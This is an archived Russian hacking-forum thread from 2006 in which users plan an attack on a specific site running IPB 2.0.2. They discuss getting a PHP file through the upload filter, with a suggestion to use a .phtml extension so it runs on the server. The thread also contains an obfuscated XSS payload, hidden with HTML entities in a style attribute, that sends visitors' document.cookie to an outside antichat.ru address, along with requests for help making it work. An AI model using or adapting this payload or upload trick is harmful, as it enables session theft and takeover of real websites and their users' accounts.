PDA

Просмотр полной версии : Как переименовывается файл после загрузки в uploads в IPB_2.*?

Elekt
26.01.2006, 06:31
Второй день мучаю IPB_2.0.2. Движок пропатчен и rst сплоиты идут лесом. Нашёл два реальных пути. Во-первых, разрешена загрузка файлов на сервере(./uploads/). Туда сэйвиться всё: аватарки(av-54.jpg), фотки (photo-32.jpg), и прочие файлы. Косяк в том, что остальные файлы доступны не по прямой ссылки, а через sql-запрос. Не смог найти идентичных исходников. Подскажите, как будет переименовываться файл после загрузки. Кстати, аватара пропускает *.php формат, но переименовывает его в *.txt. Однако сайтик без багов и переименовать в php не выходит...

Во-вторых, естественно, есть XCC. Хтмл на сайтике включен. Однако пропарсив античат нашел сплоиты конечно лишь для более поздних версий от Белого Джордана. Слегка переделав, почти получил раб.вариант, но откудато в конце кода выползают символы '> и кайф обламывается. Посоветуйте, как их убрать.
ilyha
26.01.2006, 08:34
Значит, чтобы убрать лишние символы, бб тегами сделай код максимально маленьким и цветом фона. А по поводу заливки, попробуй загружать не php, а PHTML, что сервером должно обрабатываться как php. Репу, если помог :))
Elekt
26.01.2006, 19:20
Не всё так просто. Вот код, шифрован по полной(звездочки убрать):
[/topic]]

...причем при обработке он недействует, но и не отображается....
Вот что получается при его обработке хтмл:
<a href='index.php?showtopic=wj style=background&#*58;&#*117;&#*114;&#*108;&#*40;&#*106;&#*97;&#*118;&#*97;&#*115;&#*99;&#*114;&#*105;&#*112;&#*116;&#*58;&#*100;&#*111;&#*99;&#*117;&#*109;&#*101;&#*110;&#*116;&#*46;&#*105;&#*109;&#*97;&#*103;&#*101;&#*115;&#*91;&#*49;&#*93;&#*46;&#*115;&#*114;&#*99;&#*61;&#*34;&#*104;&#*116;&#*116;&#*112;&#*58;&#*47;&#*47;&#*97;&#*110;&#*116;&#*105;&#*99;&#*104;&#*97;&#*116;&#*46;&#*114;&#*117;&#*47;&#*99;&#*103;&#*105;&#*45;&#*98;&#*105;&#*110;&#*47;&#*115;&#*46;&#*106;&#*112;&#*103;&#*63;&#*34;+document.cookie);/**/'> </a>'>

... вот и проблема, если он исчезает, но не работает, в чём дело? Проверял на АЕ и Опере - одинаково. Причем, откуда беруться последние два символа, я не знаю(и их видно).
rent0n
26.01.2006, 20:38
а PHTML, что сервером должно обрабатываться как php. Репу, если помог
А вот это не есть факт...